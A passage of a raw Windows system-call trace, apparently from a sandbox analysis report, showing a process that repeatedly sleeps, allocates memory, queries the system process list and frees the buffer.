NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.981] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.035] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.042] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.049] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.059] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.075] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.082] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.089] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.097] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.105] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.133] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, 